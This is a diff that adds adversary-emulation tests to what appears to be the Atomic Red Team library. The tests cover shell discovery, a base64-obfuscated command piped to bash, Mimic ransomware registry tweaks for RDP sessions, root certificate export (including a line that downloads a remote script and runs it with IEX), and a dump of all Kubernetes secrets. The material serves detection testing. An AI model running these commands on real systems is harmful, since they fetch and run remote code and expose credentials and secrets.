+        elevation_required: false
+        command: |
+          echo $0
+          if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
+          if $(printenv SHELL >/dev/null); then printenv SHELL; fi
+    - name: What shells are available
+      auto_generated_guid: bf23c7dc-1004-4949-8262-4c1d1ef87702
+      description: 'An adversary may want to discover which shell''s are available
+        so that they might switch to that shell to tailor their attacks to suit that
+        shell. The following commands will discover what shells are available on the
+        host.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        name: sh
+        elevation_required: false
+        command: "cat /etc/shells \n"
+    - name: Command line scripts
+      auto_generated_guid: b04ed73c-7d43-4dc8-b563-a2fc595cba1a
+      description: 'An adversary may type in elaborate multi-line shell commands into
+        a terminal session because they can''t or don''t wish to create script files
+        on the host. The following command is a simple loop, echoing out Atomic Red
+        Team was here!
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        name: sh
+        command: 'for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep
+          1; done
+
+          '
+    - name: Obfuscated command line scripts
+      auto_generated_guid: 5bec4cc8-f41e-437b-b417-33ff60acf9af
+      description: 'An adversary may pre-compute the base64 representations of the
+        terminal commands that they wish to execute in an attempt to avoid or frustrate
+        detection. The following commands base64 encodes the text string id, then
+        base64 decodes the string, then pipes it as a command to bash, which results
+        in the id command being executed.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        name: sh
+        elevation_required: false
+        command: "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n
+          \"$ART\" |base64 -d |/bin/bash\nunset ART \n"
  T1559:
    technique:
      x_mitre_platforms:
@@ -78226,6 +78339,84 @@ credential-access:
          Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
          Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
        name: powershell
+    - name: CertUtil ExportPFX
+      auto_generated_guid: 336b25bf-4514-4684-8924-474974f28137
+      description: |
+        The following Atomic test simulates adding a generic non-malicious certificate to the Root certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. In addition, this Atomic utilizes CertUtil to export the PFX (ExportPFX), similar to what was seen in the Golden SAML attack.
+        Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+        Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+        Reference: https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
+      supported_platforms:
+      - windows
+      input_arguments:
+        output:
+          description: file path to export to
+          type: Path
+          default: c:\temp\atomic.pfx
+        password:
+          description: password for cert
+          type: String
+          default: password
+      executor:
+        command: "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1'
+          -UseBasicParsing) \ncertutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400
+          #{output}\n"
+        cleanup_command: "Get-ChildItem -Path Cert:\\ -Recurse | Where-Object { $_.Thumbprint
+          -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item \n"
+        name: powershell
+        elevation_required: true
+    - name: Export Root Certificate with Export-PFXCertificate
+      auto_generated_guid: 7617f689-bbd8-44bc-adcd-6f8968897848
+      description: |
+        Creates a Root certificate and exports it with Export-PFXCertificate PowerShell Cmdlet.
+        Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-PFXCertificate.
+      supported_platforms:
+      - windows
+      input_arguments:
+        pfx_path:
+          description: output path of the certificate
+          type: String
+          default: "$env:Temp\\atomicredteam.pfx"
+      executor:
+        command: |
+          $mypwd = ConvertTo-SecureString -String "AtomicRedTeam" -Force -AsPlainText
+          $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+          Set-Location Cert:\LocalMachine\My
+          Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath #{pfx_path} -Password $mypwd
+        cleanup_command: |
+          try {
+          $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
+          Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+          Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+          } catch { }
+        name: powershell
+        elevation_required: true
+    - name: Export Root Certificate with Export-Certificate
+      auto_generated_guid: 78b274f8-acb0-428b-b1f7-7b0d0e73330a
+      description: |
+        Creates a Root certificate and exports it with Export-Certificate PowerShell Cmdlet.
+        Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-Certificate.
+      supported_platforms:
+      - windows
+      input_arguments:
+        pfx_path:
+          description: Path of the certificate
+          type: Path
+          default: "$env:Temp\\AtomicRedTeam.cer"
+      executor:
+        command: |
+          $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+          Set-Location Cert:\LocalMachine\My
+          Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
+        cleanup_command: |
+          try {
+             $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore
+             Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+             Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+          }
+          catch { }
+        name: powershell
+        elevation_required: true
  T1557.001:
    technique:
      x_mitre_platforms:
@@ -83231,6 +83422,31 @@ credential-access:
      - Administrator
      identifier: T1552.007
    atomic_tests:
+    - name: List All Secrets
+      auto_generated_guid: 31e794c4-48fd-4a76-aca4-6587c155bc11
+      description: |
+        A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services or provide further access to the cluster.
+        [More information about secrets](https://kubernetes.io/docs/concepts/configuration/secret/).
+
+        This test will make a request to the Kubernetes api at the `/api/v1/secrets` endpoint requesting every secret stored within the cluster.
+      supported_platforms:
+      - containers
+      dependencies:
+      - description: 'kubectl must be installed
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+        get_prereq_command: 'echo "kubectl not installed, please install kubectl (https://kubernetes.io/docs/tasks/tools/)"
+
+          '
+      executor:
+        command: 'kubectl get secrets --all-namespaces
+
+          '
+        name: bash
+        elevation_required: false
    - name: ListSecrets
      auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a
      description: 'A Kubernetes secret is an object that lets users store and manage
@@ -18,6 +18,14 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter

 - [Atomic Test #5 - New script file in the tmp directory](#atomic-test-5---new-script-file-in-the-tmp-directory)

+- [Atomic Test #6 - What shell is running](#atomic-test-6---what-shell-is-running)
+
+- [Atomic Test #7 - What shells are available](#atomic-test-7---what-shells-are-available)
+
+- [Atomic Test #8 - Command line scripts](#atomic-test-8---command-line-scripts)
+
+- [Atomic Test #9 - Obfuscated command line scripts](#atomic-test-9---obfuscated-command-line-scripts)
+

 <br/>

@@ -230,4 +238,121 @@ unset TMPFILE



+<br/>
+<br/>
+
+## Atomic Test #6 - What shell is running
+An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 7b38e5cc-47be-44f0-a425-390305c76c17
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+echo $0
+if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
+if $(printenv SHELL >/dev/null); then printenv SHELL; fi
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - What shells are available
+An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** bf23c7dc-1004-4949-8262-4c1d1ef87702
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+cat /etc/shells
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - Command line scripts
+An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** b04ed73c-7d43-4dc8-b563-a2fc595cba1a
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Obfuscated command line scripts
+An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 5bec4cc8-f41e-437b-b417-33ff60acf9af
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+ART=$(echo -n "id" |base64 -w 0)
+echo "\$ART=$ART"
+echo -n "$ART" |base64 -d |/bin/bash
+unset ART
+```
+
+
+
+
+
+
 <br/>
@@ -114,3 +114,51 @@ atomic_tests:
    cleanup_command: |
      rm $TMPFILE
      unset TMPFILE
+- name: What shell is running
+  auto_generated_guid: 7b38e5cc-47be-44f0-a425-390305c76c17
+  description: |
+    An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
+  supported_platforms:
+  - linux
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      echo $0
+      if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
+      if $(printenv SHELL >/dev/null); then printenv SHELL; fi
+- name: What shells are available
+  auto_generated_guid: bf23c7dc-1004-4949-8262-4c1d1ef87702
+  description: |
+    An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
+  supported_platforms:
+  - linux
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      cat /etc/shells 
+- name: Command line scripts
+  auto_generated_guid: b04ed73c-7d43-4dc8-b563-a2fc595cba1a
+  description: |
+    An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
+  supported_platforms:
+  - linux
+  executor:
+    name: sh
+    command: |
+      for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
+- name: Obfuscated command line scripts
+  auto_generated_guid: 5bec4cc8-f41e-437b-b417-33ff60acf9af
+  description: |
+    An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
+  supported_platforms:
+  - linux
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      ART=$(echo -n "id" |base64 -w 0)
+      echo "\$ART=$ART"
+      echo -n "$ART" |base64 -d |/bin/bash
+      unset ART 
@@ -98,6 +98,10 @@ The Registry of a remote system may be modified to aid in execution of files as

 - [Atomic Test #44 - Enabling Restricted Admin Mode via Command_Prompt](#atomic-test-44---enabling-restricted-admin-mode-via-command_prompt)

+- [Atomic Test #45 - Mimic Ransomware - Enable Multiple User Sessions](#atomic-test-45---mimic-ransomware---enable-multiple-user-sessions)
+
+- [Atomic Test #46 - Mimic Ransomware - Allow Multiple RDP Sessions per User](#atomic-test-46---mimic-ransomware---allow-multiple-rdp-sessions-per-user)
+

 <br/>

@@ -1649,4 +1653,70 @@ reg delete "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAd



+<br/>
+<br/>
+
+## Atomic Test #45 - Mimic Ransomware - Enable Multiple User Sessions
+This test emulates Mimic ransomware's ability to enable multiple user sessions by modifying the AllowMultipleTSSessions value within the Winlogon registry key. 
+See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 39f1f378-ba8a-42b3-96dc-2a6540cfc1e3
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /t REG_DWORD /v AllowMultipleTSSessions /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /v AllowMultipleTSSessions /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #46 - Mimic Ransomware - Allow Multiple RDP Sessions per User
+This test emulates Mimic ransomware's ability to enable multiple RDP sessions per user by modifying the fSingleSessionPerUser value within the Terminal Server registry key. 
+See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 35727d9e-7a7f-4d0c-a259-dc3906d6e8b9
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /f >nul 2>&1
+```
+
+
+
+
+
 <br/>
@@ -707,3 +707,31 @@ atomic_tests:
      reg delete "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin >nul 2>&1
    name: command_prompt
    elevation_required: true
+- name: Mimic Ransomware - Enable Multiple User Sessions
+  auto_generated_guid: 39f1f378-ba8a-42b3-96dc-2a6540cfc1e3
+  description: |
+    This test emulates Mimic ransomware's ability to enable multiple user sessions by modifying the AllowMultipleTSSessions value within the Winlogon registry key. 
+    See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /t REG_DWORD /v AllowMultipleTSSessions /d 1 /f
+    cleanup_command: |
+      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /v AllowMultipleTSSessions /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Mimic Ransomware - Allow Multiple RDP Sessions per User
+  auto_generated_guid: 35727d9e-7a7f-4d0c-a259-dc3906d6e8b9
+  description: |
+    This test emulates Mimic ransomware's ability to enable multiple RDP sessions per user by modifying the fSingleSessionPerUser value within the Terminal Server registry key. 
+    See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true    
@@ -4,7 +4,7 @@

 Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)

-Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.
+Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

 For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

@@ -24,6 +24,12 @@ Some private keys require a password or passphrase for operation, so an adversar

 - [Atomic Test #7 - ADFS token signing and encryption certificates theft - Remote](#atomic-test-7---adfs-token-signing-and-encryption-certificates-theft---remote)

+- [Atomic Test #8 - CertUtil ExportPFX](#atomic-test-8---certutil-exportpfx)
+
+- [Atomic Test #9 - Export Root Certificate with Export-PFXCertificate](#atomic-test-9---export-root-certificate-with-export-pfxcertificate)
+
+- [Atomic Test #10 - Export Root Certificate with Export-Certificate](#atomic-test-10---export-root-certificate-with-export-certificate)
+

 <br/>

@@ -341,4 +347,136 @@ Install-Module -Name AADInternals -Force



+<br/>
+<br/>
+
+## Atomic Test #8 - CertUtil ExportPFX
+The following Atomic test simulates adding a generic non-malicious certificate to the Root certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. In addition, this Atomic utilizes CertUtil to export the PFX (ExportPFX), similar to what was seen in the Golden SAML attack.
+Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+Reference: https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 336b25bf-4514-4684-8924-474974f28137
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output | file path to export to | Path | c:&#92;temp&#92;atomic.pfx|
+| password | password for cert | String | password|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) 
+certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output}
+```
+
+#### Cleanup Commands:
+```powershell
+Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Export Root Certificate with Export-PFXCertificate
+Creates a Root certificate and exports it with Export-PFXCertificate PowerShell Cmdlet.
+Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-PFXCertificate.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7617f689-bbd8-44bc-adcd-6f8968897848
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| pfx_path | output path of the certificate | String | $env:Temp&#92;atomicredteam.pfx|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$mypwd = ConvertTo-SecureString -String "AtomicRedTeam" -Force -AsPlainText
+$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+Set-Location Cert:\LocalMachine\My
+Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath #{pfx_path} -Password $mypwd
+```
+
+#### Cleanup Commands:
+```powershell
+try {
+$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
+Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+} catch { }
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Export Root Certificate with Export-Certificate
+Creates a Root certificate and exports it with Export-Certificate PowerShell Cmdlet.
+Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-Certificate.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 78b274f8-acb0-428b-b1f7-7b0d0e73330a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| pfx_path | Path of the certificate | Path | $env:Temp&#92;AtomicRedTeam.cer|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+Set-Location Cert:\LocalMachine\My
+Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
+```
+
+#### Cleanup Commands:
+```powershell
+try {
+   $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore
+   Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+   Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+}
+catch { }
+```
+
+
+
+
+
 <br/>
@@ -197,3 +197,81 @@ atomic_tests:
      Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
      Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
    name: powershell
+- name: CertUtil ExportPFX
+  auto_generated_guid: 336b25bf-4514-4684-8924-474974f28137
+  description: |
+    The following Atomic test simulates adding a generic non-malicious certificate to the Root certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. In addition, this Atomic utilizes CertUtil to export the PFX (ExportPFX), similar to what was seen in the Golden SAML attack.
+    Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+    Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+    Reference: https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
+  supported_platforms:
+  - windows
+  input_arguments:
+    output:
+      description: file path to export to
+      type: Path
+      default: c:\temp\atomic.pfx
+    password:
+      description: password for cert
+      type: String
+      default: password
+  executor:
+    command: |
+       IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) 
+       certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output}
+    cleanup_command: |
+       Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item 
+    name: powershell
+    elevation_required: true
+- name: Export Root Certificate with Export-PFXCertificate
+  auto_generated_guid: 7617f689-bbd8-44bc-adcd-6f8968897848
+  description: |
+    Creates a Root certificate and exports it with Export-PFXCertificate PowerShell Cmdlet.
+    Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-PFXCertificate.
+  supported_platforms:
+  - windows
+  input_arguments:
+    pfx_path:
+      description: output path of the certificate
+      type: String
+      default: $env:Temp\atomicredteam.pfx
+  executor:
+    command: |
+      $mypwd = ConvertTo-SecureString -String "AtomicRedTeam" -Force -AsPlainText
+      $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+      Set-Location Cert:\LocalMachine\My
+      Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath #{pfx_path} -Password $mypwd
+    cleanup_command: |
+      try {
+      $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
+      Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+      Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+      } catch { }
+    name: powershell
+    elevation_required: true
+- name: Export Root Certificate with Export-Certificate
+  auto_generated_guid: 78b274f8-acb0-428b-b1f7-7b0d0e73330a
+  description: |
+    Creates a Root certificate and exports it with Export-Certificate PowerShell Cmdlet.
+    Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-Certificate.
+  supported_platforms:
+  - windows
+  input_arguments:
+    pfx_path:
+      description: Path of the certificate
+      type: Path
+      default: $env:Temp\AtomicRedTeam.cer
+  executor:
+    command: |
+      $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+      Set-Location Cert:\LocalMachine\My
+      Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
+    cleanup_command: |
+      try {
+         $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore
+         Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+         Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+      }
+      catch { }
+    name: powershell
+    elevation_required: true 
@@ -6,14 +6,59 @@ An adversary may access the Docker API to collect logs that contain credentials

 ## Atomic Tests

- [Atomic Test #1 - ListSecrets](#atomic-test-1---listsecrets)
+- [Atomic Test #1 - List All Secrets](#atomic-test-1---list-all-secrets)

- [Atomic Test #2 - Cat the contents of a Kubernetes service account token file](#atomic-test-2---cat-the-contents-of-a-kubernetes-service-account-token-file)
+- [Atomic Test #2 - ListSecrets](#atomic-test-2---listsecrets)
+
+- [Atomic Test #3 - Cat the contents of a Kubernetes service account token file](#atomic-test-3---cat-the-contents-of-a-kubernetes-service-account-token-file)


 <br/>

-## Atomic Test #1 - ListSecrets
+## Atomic Test #1 - List All Secrets
+A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services or provide further access to the cluster.
+[More information about secrets](https://kubernetes.io/docs/concepts/configuration/secret/).
+
+This test will make a request to the Kubernetes api at the `/api/v1/secrets` endpoint requesting every secret stored within the cluster.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** 31e794c4-48fd-4a76-aca4-6587c155bc11
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+kubectl get secrets --all-namespaces
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: kubectl must be installed
+##### Check Prereq Commands:
+```bash
+which kubectl
+```
+##### Get Prereq Commands:
+```bash
+echo "kubectl not installed, please install kubectl (https://kubernetes.io/docs/tasks/tools/)"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - ListSecrets
 A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services.

 **Supported Platforms:** Containers
@@ -58,7 +103,7 @@ echo "kubectl must be installed manually"
 <br/>
 <br/>

-## Atomic Test #2 - Cat the contents of a Kubernetes service account token file
+## Atomic Test #3 - Cat the contents of a Kubernetes service account token file
 Access the Kubernetes service account access token stored within a container in a cluster.

 **Supported Platforms:** Linux
@@ -1,6 +1,28 @@
 attack_technique: T1552.007
 display_name: Kubernetes List Secrets
 atomic_tests:
+- name: List All Secrets
+  auto_generated_guid: 31e794c4-48fd-4a76-aca4-6587c155bc11
+  description: |
+    A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services or provide further access to the cluster.
+    [More information about secrets](https://kubernetes.io/docs/concepts/configuration/secret/).
+
+    This test will make a request to the Kubernetes api at the `/api/v1/secrets` endpoint requesting every secret stored within the cluster.
+  supported_platforms:
+  - containers
+  dependencies:
+  - description: |
+      kubectl must be installed
+    prereq_command: |
+      which kubectl
+    get_prereq_command: |
+      echo "kubectl not installed, please install kubectl (https://kubernetes.io/docs/tasks/tools/)"
+  executor:
+    command: |
+      kubectl get secrets --all-namespaces
+    name: bash
+    elevation_required: false
+
 - name: ListSecrets
  auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a
  description: |
@@ -40,6 +40,8 @@ Modifying or disabling a system firewall may enable adversary C2 communications,

